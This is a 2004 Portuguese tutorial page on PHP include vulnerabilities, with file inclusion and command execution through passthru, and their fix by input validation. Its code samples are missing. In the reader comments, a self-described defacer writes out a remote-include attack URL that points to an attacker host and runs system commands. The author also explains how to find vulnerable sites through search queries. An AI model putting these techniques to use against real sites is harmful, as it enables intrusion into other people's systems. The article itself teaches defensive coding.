quinta-feira, 29 de julho de 2010
Busca  
Porta 80 Web Hosting
 :: Acessibilidade
Ir para conteúdo principal: ALT + 1
 :: Participe
Seja um autor de CD/DVD de Treinamento
Publique um artigo
Publique uma oportunidade
Publique uma notícia
Publique um curso
Publique uma dica
Publique um código
 :: Informativo
Receba nossos informativos por e-mail.
E-mail:   
 
Digite a palavra abaixo:  
 
 
 :: Oportunidades
Cadastrar oportunidades
Gerenciar suas oportunidades
Cadastrar nova empresa
 :: Especiais
Básico de C++
C++ Builder
Curso ASP.NET 3.5 em VB.NET e C#
Guia Prático de HTML
Testes com Visual Studio Team System 2008
 :: Desenvolvimento
ActionScript
ADO.NET
ASP
ASP.NET
Automação Comercial
C#
C/C++
Coldfusion
CSS
Delphi
Disp. Móveis
HTML
Java
Javascript
LSL (Second Life)
Modelagem
PHP
Python
Sharepoint
Silverlight
SQL
VBA (Office)
Visual Basic
Visual Basic .NET
Visual Fox Pro
WCF/WPF
Web Services
XML
 :: Infra
BizTalk Server
CRM
Exchange Server
ForeFront / Antigen / IAG
Interoperabilidade
ISA Server
Linux
MOF
MS Dynamics CRM
Network
OCS / LCS
Outlook
Powershell e Scripts
Redes
Segurança
System Center e Gerenciamento
Virtualização
Windows
Windows Server
 :: Banco de Dados
Access
Caché
Firebird
Interbase
MySQL
Oracle
SQL Server
Sybase
 :: Gerência
Arquitetura
Ciclo de Vida de Desenvolvimento
Controle de Versão
Estimativas
Metodologias
MOF
Qualidade e Testes
 :: Design
Corel
Flash
Photopaint
Photoshop
 :: Livros
Análise Sistemas
Aplicativos
Banco de Dados
Certificação
Design e CAD
Gerência
Hardware
Internet
Programação
Programação Web
Rede
Segurança
Servidores
Sistemas Operacionais
 :: CDs/DVDs
Desenvolvimento
Infra
Design
 :: E-Books
.NET 2.0 (VS 2005)
.NET 1.1 (VS 2003)
SQL Server
Excel 2007
Excel 2003
Access 2003
ASP 3.0
Delphi
Java
Artigos
PHP: Segurança com includes
Por: Rodrigo Sebold
[Entre em contato com o autor ]
Feed de artigos.
Feed de artigos deste autor.
Gere seu feed personalizado  
PHP: Segurança com includes
Publicado em: 14/12/2004

Salve galera do PHP!!!

Vou falar sobre "vulnerabilidade" ou melhor um descuido do programador ao desenvolver um sistema de includes. Digamos que seja desenvolvido o seguinte script PHP em que o usuário irá acessar o site e suas categorias pelo seguinte endereço:

Citação:

Onde o arquivo index.php seria:

Citação:

Tudo certo??? Não! Tudo errado. Digamos que algum usuário mal intencionado acesse o site pela seguinte url:

Citação:

E agora o arquivo pegar_dados.php vai conter:

Citação:

Ou quem sabe o usuário poderia vir a "tomar posse" do sistema usando o comandos do sistema operacional. Com a função passthru("comando") abaixo vou mostrar um arquivo que mostraria todos os dados da unidade C:, mas lembrando que poderia ser executado qualquer outro comando...

Citação:

E lembrando que o usuario poderá acessar qualquer arquivo do sistema por exemplo:

Citação:

A solução para esses casos seria simplesmente a validação de dados que o usuário vai enviar. O arquivo index.php "seguro" ficaria desta maneira:

Citação:

Pessoalmente não acho conveniente sistemas de include desenvolvidos deste modo, porque quanto mas você poder esconder como é o sistema melhor, ficaria bom se os includes fossem dados por id exemplo http://www.site.com.br/index.php?arquivo=1 e ficaria melhor ainda se possível você mudar a extensão do php para .html por exemplo...

E se caso algum dia você precisar desenvolver algum script que irá utilizar a função passthru(), dererá ser feito a validação dos dados com a funcão escapeshellarg() ou escapeshellcmd().

Sendo assim vou finalizando aqui. Qualquer dúvida é so postar ai vamos fazer o possível para responder ela... Até mais!!! ;D

Vistem: http://www.rootsec.hcerto.com/forum/





O que você fará com o Visual Studio 2010?



 

Inclua um comentário sobre o artigo Topo
Elogios e críticas são muito bem vindos, porém o comentário deve ter referência ao artigo em pauta.
O portal e o autor agradecem.
Nome:    
E-mail:      
Comentários:    
Digite a palavra abaixo:  
Para dúvidas técnicas, NÃO UTILIZE ESTE ESPAÇO, utilize nosso fórum de discussão.
http://linhadecodigo.com.br/cs2/forum
 
Comentários sobre o artigo Ver Todos comentários
Bom e Legal - mas toma cuidado com o Erro de Português(tá escrito Vistem em vez de Visitem no fim do Post) - algo que deve ser evitado ao máximo.
Quem enviou: Fernando
Postado em: 14/6/2009 0:00:00
Pessoal, usem + post e menos get.... nada de endereço.php?algo="tudooqueeuquero"...

Abraços!
Quem enviou: Michel Ramos
Postado em: 11/11/2007 0:00:00
Olá gostaria de dizer que seu tutorial é muito bom e bastante educacional, mais infelizmente um prato cheio para defacers, eu sou um Defacer tbm, e queria dizer, que as includes vareiam de script para script, tipo pode ser assim www.site.com/index.php?page=http://www.hacker.com/cmd.bat?cmd= id ;uname -a ;pwd ;uptime

bem a cmd pode variar entre varias extenções, mais menos .php pq na hr da injeção o html vai desmanchar intende?? gostei muito do tutorial, quem ai conhcer bastante de erros e scripts e includes php''s vamos trocar informações eu tenho bastante coisas adcionais aqui, e estou louko pela troca de informação

me add ai no msn quem estiver affim de trocar info: melodic_heavy@hotmail.com

abração ai pra todos..

ou qqer coisa irc.gigachat.net on #H1r4x
Quem enviou: crackt0r
Postado em: 25/12/2005 0:00:00
José, note que no primeiro script, a conexão com o mysql não foi fechada. Já no segundo, o Rodrigo usou a função mysql_close(); Assim, evita-se que a base de dados seja acessada. Corrijam-me se estiver errado :) Falows;
Quem enviou: Renato Azevedo
Postado em: 24/4/2005 0:00:00
tudo bem mas mesmo que ele faça um include para um php dele sem a senha do db jamais conseguirá listar a tabela users...

é isso?
Quem enviou: José
Postado em: 9/3/2005 0:00:00
Este artigo me deixou com uma dúvida...

Ao incluir um arquivo "local" PHP em um script através do método GET o include lê o arquivo sem processa-lo pois ele não passa por nenhum filtro/processo...

Ao incluir um arquivo PHP que está em outro site o Apache processa e manda o arquivo processado para quem requeriu, ou seja quando o arquivo é incluido de outro site, não chega o escopo de variáveis do outro script.

Agora, usando outra extenção de arquivo que o apache não processe, interpretendo como um arquivo texto, por ex. não sei dizer se seria viável.

Se "não", fica inutíl o artigo acima.

Alguém poderia me responder?
Quem enviou: Newton Pasqualini
Postado em: 4/2/2005 0:00:00
Sim, aplica-se a algumas situações mas ainda muito encontradas na internet. Para se encontrar site que tenham erros assim basta ir no Google e digitar a palavra de busca "word", irá retonar muitos sites com sistemas de include assim www.site.com.br/index.php?word=arquivo.php é só ir testando um pouco que logo já se encontra um site que tenha essas falhas.
Quem enviou: Rodrigo Sebold
Postado em: 15/12/2004 0:00:00
Interessante artigo, mais se aplica somente a algumas situações, conforme documentação no site php.net:

"Quando um arquivo é incluído, o interpretador sai do modo PHP e entra no modo HTML (no começo do arquivo incluído), e alterna novamente no seu fim. Por isso, qualquer código dentro do arquivo incluído que precisa ser executado como código PHP tem de ser delimitado por tags válidas de abertura e fechamento."
"Se ''URL fopen wrappers'' estão ativas no PHP (normalmente na configuração default), você pode especificar um arquivo utilizando uma URL (via HTTP ou qualquer outro wrapper suportado --- veja Apêndice L para uma lista dos protocolos) em vez de uma caminho local. Se o servidor apontado interpreta o arquivo informado como código PHP, variáveis podem ser passadas ao arquivo incluído na URL de requisição como num HTTP GET. Isto não é necessariamente a mesma coisa que incluir o arquivo e compartilhar o escopo de variável do arquivo principal: o script será executado no servidor remoto e apenas seu resultado será incluído no script local."
"Atenção : A versões Windows do PHP anteriores ao PHP 4.3.0 não suportam acesso a arquivos remotos através desta função, mesmo se allow_url_fopen estiver ativado. "

http://br.php.net/manual/pt_BR/function.include.php

abx
Quem enviou: Marcelo
Postado em: 15/12/2004 0:00:00
Boas dicas.
Quem enviou: Marcos chandler
Postado em: 14/12/2004 0:00:00
Outros artigos do autor Topo
  Ainda não existem novos artigos para este autor.
Artigos relacionados Topo
IV ENSOL - Performance de PHP
Desenvolvedor Profissional. Será?
Economia e Liberdade: o software livre une o útil ao agradável
Sou programador, o mágico atende na sala ao lado
Xdebug: instalação, configuração e utilização com WAMP Server
Maldito sobrinho
PHP: Anti SQLInjection no Login
Migração do Joomla CMS e instalação do WAMPServer em Windows Server 2003
Fazendo um simples upload de arquivo com php
Tutorial - Criptografando senhas em PHP
PHP e MySQL: sistema de paginação
Classe para Conexão com o MySQL
PHP - Classe para Upload de Arquivo
Instalando e Configurando o EasyPHP
Upload de arquivos em Flash usando a Class FileReference e integração com PHP e MySQL
Servidor Web de MP3 com Amarok
Cadastro em PHP com AJAX + DOM
Aplicando AJAX com PHP, parte 2 - Combos e validação de formulário
O novo motor da web
PHP5 + OOP - Parte 1 - Autoloading
Configurando o IIS para rodar php 5 – Windows XP SP2
Oracle PL/Web em versao Open Source com PHP e PostgreSQL
Utilizando Impressora Não-Fiscal Bematech em Aplicações WEB (PHP)
Formulários acessíveis à prova de spam
Administrando banco de dados MySql com PHPMyadmin
Instalando Apache + MySQL + PHP 5 no Windows - (Segunda edição)
O que é AJAX e como aplicá-la com PHP, parte 1
Miniframework PHP
Safe mode - Modo seguro no PHP
PHPDOC – Documentando bem seu código
Produtos relacionados Topo
Pacote: Promoção PHP + MYSQL Intelimax (válido somente para pagamento via boleto bancário)
Livro: Recursos Visuais na Web com PHP
Livro: Crie um Sistema Web com PHP 5 e AJAX - Controle de Estoque
CD/DVD: DVD Criando uma loja virtual completa com PHP e MySql
CD/DVD: Curso PHP, CSS, HTML - Vídeo Aula - 25 horas
Livro: Introdução à HTML e PHP
Livro: PHP Programando com Orientação a Objetos (inclui Design Patterns)
Livro: Ajax na Prática - Todo o poder dos melhores Frameworks Ajax aliados ao desenvolvimento Web 2.0 com PHP 5
Livro: Web Interativa com Ajax e PHP
Livro: PHP para quem conhece PHP
Livro: Treinamento Prático em ActionScript
© Copyright 2001-2010 Codeline Editora, Comércio e Tecnologia Ltda. | Política de privacidade e de uso | Anuncie | Fale conosco

» Site hospedado na Porta 80 Web Hosting «
Nossos números
Dicas: 1.314
Códigos/scripts: 279
Funções de VBScript : 90
Funções JScript : 05
Livros: 1.805
Notícias: 2.488
Artigos: 2.972
Cases: 14
Oportunidades: 4.546
Publicidade

Conheça a loja do Linha de Código.

Microsoft indica Linha de Código.

Assine a Revista Mundo .NET
Portal de Vídeos .NET - os melhores vídeos .NET estão aqui
O que você fará com o Visual Studio 2010?
Revista Codificando .Net

Siga-nos no Twitter

Linha de Código no Orkut
Fórum de discussão do portal Linha de Código
Feeds
Oportunidades
Notícias
Artigos
Artigos personalizado
       (Por assunto)
Artigos personalizado
       (Por autor)
Portal Vídeos .NET
Portal Vídeos Delphi
LC Blog
       (Onde você faz a notícia)
Promoções
Promoção Mobile com entrega via download (válido somente para pagamento via boleto bancário)
Promoção Mobile com entrega via download (válido somente para pagamento via boleto bancário)
De: R$ 189,00
Por: R$ 126,00
Promoção Wordpress + Tabless (válido somente para pagamento via boleto bancário)
De: R$ 149,70
Por: R$ 99,80
Promoção C# Básico (válido somente para pagamento via boleto bancário)
De: R$ 185,90
Por: R$ 136,00
Promoção PHP + MYSQL Intelimax (válido somente para pagamento via boleto bancário)
De: R$ 308,00
Por: R$ 219,00
Promoção Especial Infra
De: R$ 175,95
Por: R$ 136,00
CDs/DVDs
DVD Desenvolvimento de Games - Programando Jogos com o 3D Game Studio
DVD Desenvolvimento de Games - Programando Jogos com o 3D Game Studio
Por: R$ 59,00
DVD Curso de CorelDraw X4
Por: R$ 79,90
DVD Curso de Fireworks CS4
Por: R$ 49,90
DVD Curso de Indesign CS4
Por: R$ 55,00
DVD Curso de Efeitos Digitais
Por: R$ 49,90
Livros
MSProject 2007 - Metodologia e Critérios de Qualidade para o Gerenciamento de Projetos
MSProject 2007 - Metodologia e Critérios de Qualidade para o Gerenciamento de Projetos
De: R$ 129,00
Por: R$ 77,40
Foundation FLASH CS3 para Designers
Ciência Moderna
De: R$ 139,00
Por: R$ 83,40
Recursos Visuais na Web com PHP
Ciência Moderna
De: R$ 49,00
Por: R$ 29,40
Crie um Sistema Web com PHP 5 e AJAX - Controle de Estoque
Erica
De: R$ 99,50
Por: R$ 84,50
Crie Projetos Gráficos com Adobe Photoshop CS4, CorelDRAW X4 e Adobe InDesign CS4 - em Português
Erica
De: R$ 77,50
Por: R$ 65,80
E-Books
Manual Completo de Estudos MCSE 70-270 - Instalando, Configurando e Administrando o Windows XP (506 páginas) - Entrega via download
Manual Completo de Estudos MCSE 70-270 - Instalando, Configurando e Administrando o Windows XP (506 páginas) - Entrega via download
Por: R$ 30,00
Manual de Estudos - Exame 70-291 - Windows Server 2003 (606 páginas) - entrega via download
Por: R$ 30,00
Dominando MS – Visio ® em 20 Passos - Melhores Práticas em Gestão de Projetos (entrega via download)
Por: R$ 30,00
MS-Project® 2007 - Melhores Práticas de Gestão de Projetos - Dominando MS – Project ® em 20 Passos (e-book com entrega via download)
Por: R$ 20,00
Banco de dados com C# e Visual Studio .Net 2005 (entrega via download)
Por: R$ 20,00
Os 10+ | Autores do dia
Israel Aéce
Júlio Cesar Fabris Battisti
Anderson Patricio
Alfred Reinold Baudisch
Luiz Felipe de Freitas
Robert Martim
Ramon Durães
Alessandro de Oliveira Faria
José Carlos Macoratti
Eric C M Oliveira
Os 10+ | Artigos do dia
HTML Básico
HTML Avançado
Criando aplicativos para o Orkut
Tutorial de Tabelas Dinâmicas no Excel – Parte 1
Excel: fórmulas matriciais
ASP.NET 2.0 - Explorando o GridView
Iniciando um projeto de Nota Fiscal Eletrônica - NFe
PL/SQL - Procedures e Funções
Excel: Comparando Listas
PHP: Formulários e upload de múltiplos arquivos e fotos